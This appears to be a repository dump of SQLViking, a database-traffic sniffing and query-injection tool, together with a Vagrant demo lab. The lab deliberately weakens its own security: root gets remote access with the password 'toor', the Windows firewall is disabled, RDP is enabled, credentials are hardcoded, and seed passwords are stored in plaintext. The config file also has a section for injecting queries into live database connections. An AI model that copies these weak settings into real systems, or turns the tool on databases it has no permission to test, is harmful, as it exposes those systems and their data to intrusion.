utcoffset(self, dt): 13 | return ZERO 14 | 15 | def tzname(self, dt): 16 | return "UTC" 17 | 18 | def dst(self, dt): 19 | return ZERO 20 | 21 | utc = UTC() 22 | 23 | # A class building tzinfo objects for fixed-offset time zones. 24 | # Note that FixedOffset(0, "UTC") is a different way to build a 25 | # UTC tzinfo object. 
26 | 27 | class FixedOffsetTimezone(tzinfo): 28 | """Fixed offset in minutes east from UTC.""" 29 | 30 | def __init__(self, offset, name=None): 31 | self.__offset = timedelta(minutes=offset) 32 | self.__name = name 33 | 34 | def utcoffset(self, dt): 35 | return self.__offset 36 | 37 | def tzname(self, dt): 38 | return self.__name 39 | 40 | def dst(self, dt): 41 | return ZERO 42 | 43 | 44 | STDOFFSET = timedelta(seconds = -_time.timezone) 45 | if _time.daylight: 46 | DSTOFFSET = timedelta(seconds = -_time.altzone) 47 | else: 48 | DSTOFFSET = STDOFFSET 49 | 50 | DSTDIFF = DSTOFFSET - STDOFFSET 51 | 52 | class LocalTimezone(tzinfo): 53 | 54 | def utcoffset(self, dt): 55 | if self._isdst(dt): 56 | return DSTOFFSET 57 | else: 58 | return STDOFFSET 59 | 60 | def dst(self, dt): 61 | if self._isdst(dt): 62 | return DSTDIFF 63 | else: 64 | return ZERO 65 | 66 | def tzname(self, dt): 67 | return _time.tzname[self._isdst(dt)] 68 | 69 | def _isdst(self, dt): 70 | tt = (dt.year, dt.month, dt.day, 71 | dt.hour, dt.minute, dt.second, 72 | dt.weekday(), 0, 0) 73 | stamp = _time.mktime(tt) 74 | tt = _time.localtime(stamp) 75 | return tt.tm_isdst > 0 76 | 77 | local = LocalTimezone() -------------------------------------------------------------------------------- /databases/sqlserver.py: -------------------------------------------------------------------------------- 1 | import abc,sys,binascii 2 | from basedb import BaseDB 3 | from sys import path 4 | from constantvalues import * 5 | path.append("databases/pytds/") 6 | import tds 7 | 8 | class SqlServerDB(BaseDB): 9 | def __init__(self): 10 | pass 11 | 12 | def encodeQuery(self,query): 13 | return query 14 | 15 | def isDB(self, payload): 16 | return UNKNOWN 17 | 18 | def isReq(self, payloads): 19 | return UNKNOWN 20 | 21 | def isResp(self, payloads): 22 | return UNKNOWN 23 | 24 | def parseReq(self,pkt,conn): 25 | data = str(pkt[TCP])[20:].encode('hex') 26 | return "\n--SQLServ Req--\n%s\n"%self.readable(data) 27 | 28 | def parseResp(self, data, conn): 29 | data = str(pkt[TCP])[20:] 30 | resp = Response(data) 31 | resp.parse() 32 | 33 | if len(resp.messages) > 0: 34 | self.store("--SQLServ Resp--\n%s"%resp.messages[0]['message']) 35 | else: 36 | self.store("--SQLServ Resp--\n%s"%resp.results) 37 | 38 | def validAscii(self,h): 39 | if int(h,16)>31 and int(h,16)<127: 40 | return True 41 | return False 42 | 43 | def readable(self,data): 44 | a="" 45 | for i in range(0,len(data),2): 46 | if self.validAscii(data[i:i+2]): 47 | a+=data[i:i+2].decode('hex') 48 | return a 49 | 50 | class Response(): 51 | def __init__(self, data): 52 | self.data = data 53 | self.messages = [] 54 | self.results = [] 55 | self.tdssock = tds._TdsSocket(self.data) 56 | 57 | def parse(self): 58 | try: 59 | while True: 60 | self.tdssock._main_session.find_result_or_done() 61 | except: 62 | pass 63 | 64 | try: 65 | self.messages = self.tdssock._main_session.messages 66 | except: 67 | pass 68 | 69 | self.results = self.tdssock._main_session.results 70 | 71 | class Request(): 72 | def __init__(self): 73 | self.tdssock = tds._TdsSocket() 74 | 75 | def buildRequest(self,query): 76 | self.tdssock._main_session.submit_plain_query(query) 77 | return binascii.hexlify(self.tdssock._main_session._writer.data).decode('hex') -------------------------------------------------------------------------------- /demo/Vagrantfile: -------------------------------------------------------------------------------- 1 | # -*- mode: ruby -*- 2 | # vi: set ft=ruby : 3 | 4 | # Vagrantfile API/syntax version. 
Don't touch unless you know what you're doing! 5 | VAGRANTFILE_API_VERSION = "2" 6 | 7 | ENV['VAGRANT_DEFAULT_PROVIDER'] = 'virtualbox' 8 | 9 | if ! File.exists?('./NDP451-KB2858728-x86-x64-AllOS-ENU.exe') 10 | puts '.Net 4.5 installer could not be found!' 11 | puts "Please run:\n wget http://download.microsoft.com/download/1/6/7/167F0D79-9317-48AE-AEDB-17120579F8E2/NDP451-KB2858728-x86-x64-AllOS-ENU.exe" 12 | exit 1 13 | end 14 | 15 | if ! File.exists?('./SQLEXPRWT_x64_ENU.exe') 16 | puts 'SQL Server installer could not be found!' 17 | puts "Please run:\n wget http://download.microsoft.com/download/0/4/B/04BE03CD-EAF3-4797-9D8D-2E08E316C998/SQLEXPRWT_x64_ENU.exe" 18 | exit 1 19 | end 20 | 21 | Vagrant.configure(VAGRANTFILE_API_VERSION) do |config| 22 | 23 | ##########Setup Vulnerable Test App ########### 24 | 25 | config.vm.define :weakapp do |app| 26 | app.vm.box = "phusion/ubuntu-14.04-amd64" 27 | 28 | app.vm.provider "virtualbox" do |v| 29 | #v.gui = true 30 | v.name = "(SQLVIKING) Comment Application" 31 | end 32 | 33 | app.vm.network "private_network", ip: "192.168.123.10" 34 | app.vm.network :forwarded_port, guest:4567, host:4567 35 | app.vm.provision "shell", path: "vagrant-scripts/prepare-weakapp.sh" 36 | app.vm.provision "shell", path: "vagrant-scripts/setup-weakapp.sh" 37 | end 38 | 39 | ########## Setup MSSQL Server ########### 40 | 41 | config.vm.define :mssql do |sql| 42 | sql.vm.box = "ferventcoder/win2008r2-x64-nocm" 43 | sql.vm.guest = :windows 44 | sql.vm.provider "virtualbox" do |v| 45 | #v.gui = true 46 | v.name = "(SQLVIKING) Microsoft SQL Server" 47 | end 48 | 49 | sql.vm.communicator = "winrm" 50 | sql.vm.network "private_network", ip: "192.168.123.11" 51 | sql.vm.network "forwarded_port", guest: 3389, host: 3389 52 | sql.vm.network "forwarded_port", guest: 1433, host: 1433 53 | 54 | sql.vm.provision :shell, path: "vagrant-scripts/install-dot-net.ps1" 55 | sql.vm.provision :shell, path: "vagrant-scripts/install-sql-server.cmd" 56 | sql.vm.provision :shell, path: "vagrant-scripts/configure-sql-port.ps1" 57 | sql.vm.provision :shell, path: "vagrant-scripts/enable-rdp.ps1" 58 | 59 | end 60 | 61 | ########## Setup MySQL ############### 62 | config.vm.define :mysql do |mysql| 63 | mysql.vm.box = "phusion/ubuntu-14.04-amd64" 64 | 65 | mysql.vm.provider "virtualbox" do |v| 66 | #v.gui = true 67 | v.name = "(SQLVIKING) MySQL Server" 68 | end 69 | 70 | mysql.vm.network "private_network", ip: "192.168.123.13" 71 | mysql.vm.network :forwarded_port, guest: 3306, host: 3306 72 | mysql.vm.provision "shell", path: "vagrant-scripts/setup-mysql.sh" 73 | 74 | end 75 | 76 | ########## Setup SQLViking ########### 77 | 78 | config.vm.define :sqlviking do |viking| 79 | viking.vm.box = "phusion/ubuntu-14.04-amd64" 80 | 81 | viking.vm.provider "virtualbox" do |v| 82 | #v.gui = true 83 | v.name = "(SQLVIKING) SQLViking" 84 | v.customize ["modifyvm", :id, "--nicpromisc1", "allow-all"] 85 | v.customize ["modifyvm", :id, "--nicpromisc2", "allow-all"] 86 | end 87 | 88 | viking.vm.network "private_network", ip: "192.168.123.12" 89 | viking.vm.provision "shell", path: "vagrant-scripts/setup-sqlviking.sh" 90 | 91 | end 92 | end -------------------------------------------------------------------------------- /demo/db/create.sql: -------------------------------------------------------------------------------- 1 | USE [master] 2 | GO 3 | 4 | /****** Object: Database [test] Script Date: 10/30/2014 3:54:00 PM ******/ 5 | CREATE DATABASE [test] 6 | GO 7 | ALTER DATABASE test MODIFY FILE 8 | ( NAME = 
N'test' , SIZE = 4096KB , MAXSIZE = UNLIMITED, FILEGROWTH = 1024KB ) 9 | GO 10 | ALTER DATABASE test MODIFY FILE 11 | ( NAME = N'test_log' , SIZE = 1024KB , MAXSIZE = 2048GB , FILEGROWTH = 10%) 12 | GO 13 | 14 | ALTER DATABASE [test] SET COMPATIBILITY_LEVEL = 100 15 | GO 16 | 17 | IF (1 = FULLTEXTSERVICEPROPERTY('IsFullTextInstalled')) 18 | begin 19 | EXEC [test].[dbo].[sp_fulltext_database] @action = 'enable' 20 | end 21 | GO 22 | 23 | ALTER DATABASE [test] SET ANSI_NULL_DEFAULT OFF 24 | GO 25 | 26 | ALTER DATABASE [test] SET ANSI_NULLS OFF 27 | GO 28 | 29 | ALTER DATABASE [test] SET ANSI_PADDING OFF 30 | GO 31 | 32 | ALTER DATABASE [test] SET ANSI_WARNINGS OFF 33 | GO 34 | 35 | ALTER DATABASE [test] SET ARITHABORT OFF 36 | GO 37 | 38 | ALTER DATABASE [test] SET AUTO_CLOSE OFF 39 | GO 40 | 41 | ALTER DATABASE [test] SET AUTO_CREATE_STATISTICS ON 42 | GO 43 | 44 | ALTER DATABASE [test] SET AUTO_SHRINK OFF 45 | GO 46 | 47 | ALTER DATABASE [test] SET AUTO_UPDATE_STATISTICS ON 48 | GO 49 | 50 | ALTER DATABASE [test] SET CURSOR_CLOSE_ON_COMMIT OFF 51 | GO 52 | 53 | ALTER DATABASE [test] SET CURSOR_DEFAULT GLOBAL 54 | GO 55 | 56 | ALTER DATABASE [test] SET CONCAT_NULL_YIELDS_NULL OFF 57 | GO 58 | 59 | ALTER DATABASE [test] SET NUMERIC_ROUNDABORT OFF 60 | GO 61 | 62 | ALTER DATABASE [test] SET QUOTED_IDENTIFIER OFF 63 | GO 64 | 65 | ALTER DATABASE [test] SET RECURSIVE_TRIGGERS OFF 66 | GO 67 | 68 | ALTER DATABASE [test] SET DISABLE_BROKER 69 | GO 70 | 71 | ALTER DATABASE [test] SET AUTO_UPDATE_STATISTICS_ASYNC OFF 72 | GO 73 | 74 | ALTER DATABASE [test] SET DATE_CORRELATION_OPTIMIZATION OFF 75 | GO 76 | 77 | ALTER DATABASE [test] SET TRUSTWORTHY OFF 78 | GO 79 | 80 | ALTER DATABASE [test] SET ALLOW_SNAPSHOT_ISOLATION OFF 81 | GO 82 | 83 | ALTER DATABASE [test] SET PARAMETERIZATION SIMPLE 84 | GO 85 | 86 | ALTER DATABASE [test] SET READ_COMMITTED_SNAPSHOT OFF 87 | GO 88 | 89 | ALTER DATABASE [test] SET HONOR_BROKER_PRIORITY OFF 90 | GO 91 | 92 | ALTER DATABASE [test] SET RECOVERY FULL 93 | GO 94 | 95 | ALTER DATABASE [test] SET MULTI_USER 96 | GO 97 | 98 | ALTER DATABASE [test] SET PAGE_VERIFY CHECKSUM 99 | GO 100 | 101 | ALTER DATABASE [test] SET DB_CHAINING OFF 102 | GO 103 | 104 | ALTER DATABASE [test] SET READ_WRITE 105 | GO 106 | 107 | CREATE LOGIN test 108 | WITH PASSWORD = 'abcABC123!', 109 | CHECK_POLICY = ON; 110 | GO 111 | 112 | USE [test] 113 | GO 114 | 115 | -- Creates a database user for the login created above. 
116 | CREATE USER test FOR LOGIN test; 117 | GO 118 | 119 | EXEC sp_addrolemember N'db_owner', N'test' -------------------------------------------------------------------------------- /demo/sinatra-app/.rvmrc: -------------------------------------------------------------------------------- 1 | rvm use 2.0.0 2 | -------------------------------------------------------------------------------- /demo/sinatra-app/Gemfile: -------------------------------------------------------------------------------- 1 | source "https://rubygems.org" 2 | 3 | gem 'sinatra-activerecord' 4 | gem 'tiny_tds' 5 | gem 'mysql2' 6 | gem 'activerecord-sqlserver-adapter' 7 | gem 'rake' 8 | gem 'sidekiq' 9 | -------------------------------------------------------------------------------- /demo/sinatra-app/Gemfile.lock: -------------------------------------------------------------------------------- 1 | GEM 2 | remote: https://rubygems.org/ 3 | specs: 4 | activemodel (4.1.5) 5 | activesupport (= 4.1.5) 6 | builder (~> 3.1) 7 | activerecord (4.1.5) 8 | activemodel (= 4.1.5) 9 | activesupport (= 4.1.5) 10 | arel (~> 5.0.0) 11 | activerecord-sqlserver-adapter (4.1.0) 12 | activerecord (~> 4.1.0) 13 | arel 14 | activesupport (4.1.5) 15 | i18n (~> 0.6, >= 0.6.9) 16 | json (~> 1.7, >= 1.7.7) 17 | minitest (~> 5.1) 18 | thread_safe (~> 0.1) 19 | tzinfo (~> 1.1) 20 | arel (5.0.1.20140414130214) 21 | builder (3.2.2) 22 | celluloid (0.16.0) 23 | timers (~> 4.0.0) 24 | connection_pool (2.1.1) 25 | hitimes (1.2.2) 26 | i18n (0.6.11) 27 | json (1.8.1) 28 | minitest (5.4.1) 29 | mysql2 (0.3.17) 30 | rack (1.5.2) 31 | rack-protection (1.5.3) 32 | rack 33 | rake (10.3.2) 34 | redis (3.2.0) 35 | redis-namespace (1.5.1) 36 | redis (~> 3.0, >= 3.0.4) 37 | sidekiq (3.3.0) 38 | celluloid (>= 0.16.0) 39 | connection_pool (>= 2.0.0) 40 | json 41 | redis (>= 3.0.6) 42 | redis-namespace (>= 1.3.1) 43 | sinatra (1.4.5) 44 | rack (~> 1.4) 45 | rack-protection (~> 1.4) 46 | tilt (~> 1.3, >= 1.3.4) 47 | sinatra-activerecord (2.0.2) 48 | activerecord (>= 3.2) 49 | sinatra (~> 1.0) 50 | thread_safe (0.3.4) 51 | tilt (1.4.1) 52 | timers (4.0.1) 53 | hitimes 54 | tiny_tds (0.6.2) 55 | tzinfo (1.2.2) 56 | thread_safe (~> 0.1) 57 | 58 | PLATFORMS 59 | ruby 60 | 61 | DEPENDENCIES 62 | activerecord-sqlserver-adapter 63 | mysql2 64 | rake 65 | sidekiq 66 | sinatra-activerecord 67 | tiny_tds 68 | -------------------------------------------------------------------------------- /demo/sinatra-app/Rakefile: -------------------------------------------------------------------------------- 1 | # Rakefile 2 | require "./app" 3 | require "sinatra/activerecord/rake" 4 | -------------------------------------------------------------------------------- /demo/sinatra-app/app.rb: -------------------------------------------------------------------------------- 1 | require 'sidekiq' 2 | require 'sinatra' 3 | require 'sinatra/base' 4 | require "sinatra/activerecord" 5 | 6 | # Server/DB setup # 7 | set :database_file, "./database_mysql.yml" 8 | set :bind, '0.0.0.0' 9 | set :daemon, true 10 | 11 | # Active Record Initialization # 12 | 13 | class Comment < ActiveRecord::Base 14 | end 15 | 16 | class User < ActiveRecord::Base 17 | end 18 | 19 | class Account < ActiveRecord::Base 20 | end 21 | 22 | class UserMimic 23 | include Sidekiq::Worker 24 | def perform() 25 | puts User.all 26 | sleep(5.seconds) 27 | puts Comment.all 28 | sleep(5.seconds) 29 | puts Account.all 30 | sleep(5.seconds) 31 | User.find(1) 32 | sleep(5.seconds) 33 | user = User.find_by(name: "Ken") 34 | puts user 35 | 
puts Comment.first 36 | sleep(5.seconds) 37 | puts Account.first 38 | sleep(5.seconds) 39 | Comment.create(name: "Go Team", message: "Win Win") 40 | end 41 | end 42 | # Sidekiq to Mimic Users # 43 | 44 | class WeakApp < Sinatra::Base 45 | # Routing # 46 | get '/' do 47 | @comments = Comment.all 48 | erb :index 49 | end 50 | 51 | post '/' do 52 | Comment.create!( 53 | name: params[:name], 54 | message: params[:message] 55 | ) 56 | redirect '/' 57 | end 58 | 59 | # App with User mimic function running # 60 | 61 | get '/usermimic' do 62 | @comments = Comment.all 63 | UserMimic.perform_async() 64 | erb :index 65 | end 66 | end 67 | -------------------------------------------------------------------------------- /demo/sinatra-app/config.ru: -------------------------------------------------------------------------------- 1 | require './app' 2 | run WeakApp -------------------------------------------------------------------------------- /demo/sinatra-app/database_mysql.yml: -------------------------------------------------------------------------------- 1 | ##development: 2 | ##adapter: sqlserver 3 | ##database: test-app 4 | ##host: localhost 5 | ##username: sa 6 | ##password: '#SAPassword!' 7 | ##pool: 15 8 | ##timeout: 5000 9 | 10 | development: 11 | adapter: mysql2 12 | database: weakapp 13 | host: 192.168.123.13 14 | port: 3306 15 | username: root 16 | password: toor 17 | pool: 15 18 | timeout: 5000 19 | 20 | production: 21 | adapter: mysql2 22 | database: weakapp 23 | host: 192.168.123.13 24 | port: 3306 25 | username: root 26 | password: toor 27 | pool: 15 28 | timeout: 5000 29 | -------------------------------------------------------------------------------- /demo/sinatra-app/db/migrate/20140913010102_create_comments.rb: -------------------------------------------------------------------------------- 1 | class CreateComments < ActiveRecord::Migration 2 | def change 3 | create_table :comments do |t| 4 | t.string :name 5 | t.text :message 6 | end 7 | 8 | create_table :users do |t| 9 | t.string :name 10 | t.string :email 11 | t.string :gender 12 | t.string :password 13 | t.string :password_confirmation 14 | end 15 | 16 | create_table :accounts do |t| 17 | t.string :name 18 | t.decimal :balance 19 | t.string :status 20 | t.text :notes 21 | end 22 | end 23 | end 24 | -------------------------------------------------------------------------------- /demo/sinatra-app/db/schema.rb: -------------------------------------------------------------------------------- 1 | # encoding: UTF-8 2 | # This file is auto-generated from the current state of the database. Instead 3 | # of editing this file, please use the migrations feature of Active Record to 4 | # incrementally modify your database, and then regenerate this schema definition. 5 | # 6 | # Note that this schema.rb definition is the authoritative source for your 7 | # database schema. If you need to create the application database on another 8 | # system, you should be using db:schema:load, not running all the migrations 9 | # from scratch. The latter is a flawed and unsustainable approach (the more migrations 10 | # you'll amass, the slower it'll run and the greater likelihood for issues). 11 | # 12 | # It's strongly recommended that you check this file into your version control system. 
13 | 14 | ActiveRecord::Schema.define(version: 20140913010102) do 15 | 16 | create_table "accounts", force: true do |t| 17 | t.string "name" 18 | t.decimal "balance", precision: 10, scale: 0 19 | t.string "status" 20 | t.text "notes" 21 | end 22 | 23 | create_table "comments", force: true do |t| 24 | t.string "name" 25 | t.text "message" 26 | end 27 | 28 | create_table "users", force: true do |t| 29 | t.string "name" 30 | t.string "email" 31 | t.string "gender" 32 | t.string "password" 33 | t.string "password_confirmation" 34 | end 35 | 36 | end 37 | -------------------------------------------------------------------------------- /demo/sinatra-app/db/seeds.rb: -------------------------------------------------------------------------------- 1 | user_list = [ 2 | ["Ken","ken@ken.com","male","P@44word","P@44word"], 3 | ["Bob","bob@bob.com","male","P@44word123","P@44word123"], 4 | ["Jonn","jonn@aero.net","male","Flapper","Flapper"], 5 | ["Amy","amy@amy.net","female","amyrulez","amyrulez"], 6 | ["Josh","josh@google.com","male","maria","maria"], 7 | ["Pat","pat@b2lef.com","male","apples","apples"], 8 | ["Penny","penny@penny.net","female","nowords","nowords"], 9 | ["Art","art@monk.com","male","redskins","redskins"] 10 | ] 11 | 12 | account_list = [ 13 | ["Primary",103021,"Good","In Good standing"], 14 | ["Checking",22349,"Good","Getting there"], 15 | ["Credit",-3041,"Negative","Need to pay this off"], 16 | ["Savings",100,"Neutral","Running Low"] 17 | ] 18 | 19 | comment_list = [ 20 | ["Go Team","Doing very well guys"] 21 | ] 22 | 23 | user_list.each do |name, email, gender, password, password_confirmation| 24 | User.create( name: name, email: email, gender: gender, password: password, password_confirmation: password_confirmation) 25 | end 26 | 27 | account_list.each do |name, balance, status, notes| 28 | Account.create(name: name, balance: balance, status: status, notes: notes ) 29 | end 30 | 31 | comment_list.each do |name, message| 32 | Comment.create(name: name, message: message) 33 | end -------------------------------------------------------------------------------- /demo/sinatra-app/views/index.erb: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | SQLViking Comments! 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 19 | 20 | 29 | 30 | 31 |
[index.erb lines 32-69: the HTML markup was stripped during extraction and only text fragments survive. The view renders a "SQLViking Comments" heading, the note "This app can be used to generate requests to the database so that SQLViking can read them", a POST form with name and message fields, and, inside `<% if @comments.any? %>`, a "Comments" table built with `<% @comments.each do |comment| %> ... <% end %>` that falls back to "No comments found!" when no comments exist.]
70 | <% end %> 71 | 72 | 73 | 74 | 75 | 76 | -------------------------------------------------------------------------------- /demo/vagrant-scripts/config/my.cnf: -------------------------------------------------------------------------------- 1 | # 2 | # The MySQL database server configuration file for weakapp. This 3 | # config simply comments the bind address to allow remote connections 4 | # 5 | # You can copy this to one of: 6 | # - "/etc/mysql/my.cnf" to set global options, 7 | # - "~/.my.cnf" to set user-specific options. 8 | # 9 | # One can use all long options that the program supports. 10 | # Run program with --help to get a list of available options and with 11 | # --print-defaults to see which it would actually understand and use. 12 | # 13 | # For explanations see 14 | # http://dev.mysql.com/doc/mysql/en/server-system-variables.html 15 | 16 | # This will be passed to all mysql clients 17 | # It has been reported that passwords should be enclosed with ticks/quotes 18 | # escpecially if they contain "#" chars... 19 | # Remember to edit /etc/mysql/debian.cnf when changing the socket location. 20 | [client] 21 | port = 3306 22 | socket = /var/run/mysqld/mysqld.sock 23 | 24 | # Here is entries for some specific programs 25 | # The following values assume you have at least 32M ram 26 | 27 | # This was formally known as [safe_mysqld]. Both versions are currently parsed. 28 | [mysqld_safe] 29 | socket = /var/run/mysqld/mysqld.sock 30 | nice = 0 31 | 32 | [mysqld] 33 | # 34 | # * Basic Settings 35 | # 36 | user = mysql 37 | pid-file = /var/run/mysqld/mysqld.pid 38 | socket = /var/run/mysqld/mysqld.sock 39 | port = 3306 40 | basedir = /usr 41 | datadir = /var/lib/mysql 42 | tmpdir = /tmp 43 | lc-messages-dir = /usr/share/mysql 44 | skip-external-locking 45 | # 46 | # Instead of skip-networking the default is now to listen only on 47 | # localhost which is more compatible and is not less secure. 48 | # bind-address = 127.0.0.1 49 | # 50 | # * Fine Tuning 51 | # 52 | key_buffer = 16M 53 | max_allowed_packet = 16M 54 | thread_stack = 192K 55 | thread_cache_size = 8 56 | # This replaces the startup script and checks MyISAM tables if needed 57 | # the first time they are touched 58 | myisam-recover = BACKUP 59 | #max_connections = 100 60 | #table_cache = 64 61 | #thread_concurrency = 10 62 | # 63 | # * Query Cache Configuration 64 | # 65 | query_cache_limit = 1M 66 | query_cache_size = 16M 67 | # 68 | # * Logging and Replication 69 | # 70 | # Both location gets rotated by the cronjob. 71 | # Be aware that this log type is a performance killer. 72 | # As of 5.1 you can enable the log at runtime! 73 | #general_log_file = /var/log/mysql/mysql.log 74 | #general_log = 1 75 | # 76 | # Error log - should be very few entries. 77 | # 78 | log_error = /var/log/mysql/error.log 79 | # 80 | # Here you can see queries with especially long duration 81 | #log_slow_queries = /var/log/mysql/mysql-slow.log 82 | #long_query_time = 2 83 | #log-queries-not-using-indexes 84 | # 85 | # The following can be used as easy to replay backup logs or for replication. 86 | # note: if you are setting up a replication slave, see README.Debian about 87 | # other settings you may need to change. 88 | #server-id = 1 89 | #log_bin = /var/log/mysql/mysql-bin.log 90 | expire_logs_days = 10 91 | max_binlog_size = 100M 92 | #binlog_do_db = include_database_name 93 | #binlog_ignore_db = include_database_name 94 | # 95 | # * InnoDB 96 | # 97 | # InnoDB is enabled by default with a 10MB datafile in /var/lib/mysql/. 
98 | # Read the manual for more InnoDB related options. There are many! 99 | # 100 | # * Security Features 101 | # 102 | # Read the manual, too, if you want chroot! 103 | # chroot = /var/lib/mysql/ 104 | # 105 | # For generating SSL certificates I recommend the OpenSSL GUI "tinyca". 106 | # 107 | # ssl-ca=/etc/mysql/cacert.pem 108 | # ssl-cert=/etc/mysql/server-cert.pem 109 | # ssl-key=/etc/mysql/server-key.pem 110 | 111 | 112 | 113 | [mysqldump] 114 | quick 115 | quote-names 116 | max_allowed_packet = 16M 117 | 118 | [mysql] 119 | #no-auto-rehash # faster start of mysql but no tab completition 120 | 121 | [isamchk] 122 | key_buffer = 16M 123 | 124 | # 125 | # * IMPORTANT: Additional settings that can override those from this file! 126 | # The files must end with '.cnf', otherwise they'll be ignored. 127 | # 128 | !includedir /etc/mysql/conf.d/ -------------------------------------------------------------------------------- /demo/vagrant-scripts/configure-sql-port.ps1: -------------------------------------------------------------------------------- 1 | # http://stackoverflow.com/a/9949105 2 | $ErrorActionPreference = "Stop" 3 | 4 | echo "Configuring TCP port" 5 | 6 | # http://technet.microsoft.com/en-us/library/dd206997(v=sql.105).aspx 7 | # Load assemblies 8 | [reflection.assembly]::LoadWithPartialName("Microsoft.SqlServer.Smo") 9 | [reflection.assembly]::LoadWithPartialName("Microsoft.SqlServer.SqlWmiManagement") 10 | 11 | # http://www.dbi-services.com/index.php/blog/entry/sql-server-2012-configuring-your-tcp-port-via-powershell 12 | # Set the port 13 | $smo = 'Microsoft.SqlServer.Management.Smo.' 14 | $wmi = new-object ($smo + 'Wmi.ManagedComputer') 15 | $uri = "ManagedComputer[@Name='WIN-2008R2-STD']/ ServerInstance[@Name='SQLEXPRESS']/ServerProtocol[@Name='Tcp']" 16 | $Tcp = $wmi.GetSmoObject($uri) 17 | $wmi.GetSmoObject($uri + "/IPAddress[@Name='IPAll']").IPAddressProperties[1].Value="1433" 18 | $Tcp.alter() 19 | 20 | echo "DONE!" 21 | 22 | echo "Restarting service..." 23 | # Restart service so that configurations are applied 24 | restart-service -f "SQL Server (SQLEXPRESS)" 25 | echo "DONE!" 26 | -------------------------------------------------------------------------------- /demo/vagrant-scripts/enable-rdp.ps1: -------------------------------------------------------------------------------- 1 | # http://stackoverflow.com/a/9949105 2 | $ErrorActionPreference = "Stop" 3 | 4 | # http://networkerslog.blogspot.com.br/2013/09/how-to-enable-remote-desktop-remotely.html 5 | set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0 6 | -------------------------------------------------------------------------------- /demo/vagrant-scripts/install-dot-net.ps1: -------------------------------------------------------------------------------- 1 | # http://stackoverflow.com/a/9949105 2 | $ErrorActionPreference = "Stop" 3 | 4 | import-module servermanager 5 | echo "Installing .NET Framework" 6 | add-windowsfeature as-net-framework 7 | -------------------------------------------------------------------------------- /demo/vagrant-scripts/install-sql-server.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | echo Installing SQL Server 2008 Express R2, it will take a while... 
4 | C:\vagrant\SQLEXPRWT_x64_ENU.exe /Q /Action=install /INDICATEPROGRESS /INSTANCENAME="SQLEXPRESS" /INSTANCEID="SQLExpress" /IAcceptSQLServerLicenseTerms /FEATURES=SQL,Tools /TCPENABLED=1 /SECURITYMODE="SQL" /SAPWD="#SAPassword!" 5 | echo Done! 6 | 7 | echo Disabling firewall 8 | netsh advfirewall set allprofiles state off 9 | -------------------------------------------------------------------------------- /demo/vagrant-scripts/prepare-weakapp.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | sudo apt-get install git -y 4 | sudo apt-get install unzip -y 5 | 6 | gpg --keyserver hkp://keys.gnupg.net --recv-keys D39DC0E3 7 | \curl -sSL https://get.rvm.io | bash -s stable --ruby=2.0.0 8 | source /home/vagrant/.rvm/scripts/rvm 9 | source /usr/local/rvm/scripts/rvm 10 | 11 | #Grab Dependencies 12 | sudo apt-get install freetds-dev freetds-bin tdsodbc libmysqlclient-dev redis-server -y -------------------------------------------------------------------------------- /demo/vagrant-scripts/setup-mysql.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | sudo apt-get install git -y 4 | sudo apt-get install unzip -y 5 | sudo apt-get install debconf-utils -y 6 | echo "mysql-server-5.5 mysql-server/root_password password toor" | sudo debconf-set-selections 7 | echo "mysql-server-5.5 mysql-server/root_password_again password toor" | sudo debconf-set-selections 8 | sudo apt-get install mysql-server-5.5 -y 9 | cp -f /vagrant/vagrant-scripts/config/my.cnf /etc/mysql/my.cnf 10 | mysql -u root --password=toor -e "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'toor'" 11 | sudo service mysql restart 12 | mkdir /opt/sql/ 13 | cp -R /vagrant/* /opt/sql/ 14 | 15 | -------------------------------------------------------------------------------- /demo/vagrant-scripts/setup-sqlviking.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | sudo apt-get install git -y 4 | sudo apt-get install unzip -y 5 | 6 | mkdir /opt/sqlviking 7 | cp -R /vagrant/* /opt/sqlviking/ 8 | 9 | cd /tmp 10 | wget http://www.secdev.org/projects/scapy/files/scapy-2.3.0.zip 11 | unzip scapy-2.3.0.zip 12 | rm -rf scapy-2.3.0.zip 13 | cd scapy-2.* 14 | 15 | sudo chown -R vagrant:root /opt/sqlviking/ 16 | sudo python setup.py install 17 | 18 | cd /opt/sqlviking 19 | 20 | -------------------------------------------------------------------------------- /demo/vagrant-scripts/setup-weakapp.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | mkdir /opt/weakapp 4 | cp -R /vagrant/sinatra-app/* /opt/weakapp 5 | 6 | #Start Redis Server 7 | redis-server & 8 | 9 | cd /opt/weakapp 10 | rvm use 2.0.0 11 | bundle install 12 | bundle exec sidekiq -r ./app.rb & 13 | rake db:create 14 | rake db:migrate 15 | rake db:seed 16 | rackup -p 4567 -------------------------------------------------------------------------------- /sqlviking.conf: -------------------------------------------------------------------------------- 1 | [Databases] 2 | #type:ip:port 3 | MYSQL:192.168.1.9:3306 4 | 5 | [Injection] 6 | #ip:port:query/attack 7 | #192.168.168.128:3306:select * from users; 8 | #192.168.1.1:3306:0 9 | 10 | [Data] 11 | logToFile = True 12 | interval = 60 13 | fileName = log.txt 14 | #human, json 15 | format = json 16 | 17 | [Misc] 18 | fingerprint = False 19 | interface = en0 20 | debug = True 21 | 
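The `[Databases]` section of sqlviking.conf above lists targets in the `type:ip:port` layout described by its comment (e.g. `MYSQL:192.168.1.9:3306`). As a rough illustration of that layout only, here is a minimal sketch of splitting such an entry into its parts; the helper name `parse_db_entry` is hypothetical, and sqlviking.py's real config handling is not shown in this excerpt:

```python
# Hypothetical helper, not part of sqlviking.py: splits one [Databases]
# entry of the form "type:ip:port" into its three fields.
def parse_db_entry(line):
    dbtype, ip, port = line.strip().split(':')
    return dbtype, ip, int(port)

print(parse_db_entry('MYSQL:192.168.1.9:3306'))
# ('MYSQL', '192.168.1.9', 3306)
```

Splitting on every ':' only works because the type and IP fields contain no colons themselves; an IPv6 address, or an `[Injection]` entry of the form `ip:port:query` whose query contains colons, would need a bounded split such as `split(':', 2)`.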
